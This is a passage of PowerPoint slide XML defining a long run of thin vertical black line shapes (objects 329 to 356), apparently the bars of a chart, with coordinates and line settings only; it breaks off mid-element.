      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="object 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165984" y="3602079"/>
            <a:ext cx="0" cy="2088859"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1054100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1053731"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="object 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165413" y="3600117"/>
            <a:ext cx="1258" cy="2090117"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1054735">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="1054727"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="object 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193838" y="3584361"/>
            <a:ext cx="0" cy="2106476"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1062989">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1062677"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="object 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193565" y="3585993"/>
            <a:ext cx="2517" cy="2105217"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1062355">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="1061854"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="object 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221744" y="3886290"/>
            <a:ext cx="0" cy="1804472"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="910589">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="910310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="object 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220087" y="3887095"/>
            <a:ext cx="2517" cy="1803214"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="909955">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="909910"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="object 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249649" y="3886290"/>
            <a:ext cx="0" cy="1804472"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="910589">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="910310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="object 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249377" y="3887095"/>
            <a:ext cx="1258" cy="1803214"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="909955">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="909910"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="object 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5277502" y="4178007"/>
            <a:ext cx="0" cy="1512535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="763269">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="763106"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="object 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5274763" y="4177706"/>
            <a:ext cx="2517" cy="1512535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="763269">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="763258"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="object 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305409" y="4157639"/>
            <a:ext cx="0" cy="1532669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="773430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="773378"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="object 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304836" y="4156760"/>
            <a:ext cx="1258" cy="1533927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="774064">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="773828"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="object 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5333261" y="4235397"/>
            <a:ext cx="0" cy="1455909"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="734694">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="734141"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="object 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332988" y="4238624"/>
            <a:ext cx="2517" cy="1452134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="732789">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="732517"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="object 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361167" y="4253617"/>
            <a:ext cx="0" cy="1437034"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="725169">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="724946"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="object 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5359510" y="4253039"/>
            <a:ext cx="2517" cy="1438292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="725805">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="725243"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="object 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389073" y="4339963"/>
            <a:ext cx="0" cy="1351466"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="681989">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="681373"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="object 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5388802" y="4339084"/>
            <a:ext cx="1258" cy="1351466"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="681989">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="681822"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="object 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416380" y="4349059"/>
            <a:ext cx="0" cy="1341400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="676910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="676789"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="object 348"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413928" y="4349057"/>
            <a:ext cx="2517" cy="1341400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="676910">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="676789"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="object 349"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444285" y="4476706"/>
            <a:ext cx="0" cy="1214306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="612775">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="612368"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="object 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444012" y="4477210"/>
            <a:ext cx="0" cy="1213048"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="612139">
                <a:moveTo>
                  <a:pt x="0" y="611843"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="612119"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="object 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472191" y="4500291"/>
            <a:ext cx="0" cy="1190398"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="600710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="600467"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="object 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5471917" y="4499711"/>
            <a:ext cx="2517" cy="1191656"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="601344">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="600765"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="object 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500045" y="4578592"/>
            <a:ext cx="0" cy="1112380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="561339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="560953"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="object 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5498689" y="4581821"/>
            <a:ext cx="1258" cy="1108605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="559435">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="559330"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="object 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527951" y="4559825"/>
            <a:ext cx="0" cy="1131255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="570864">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="570425"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="object 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527678" y="4561713"/>
            <a:ext cx="1258" cy="1128739"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="569594">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
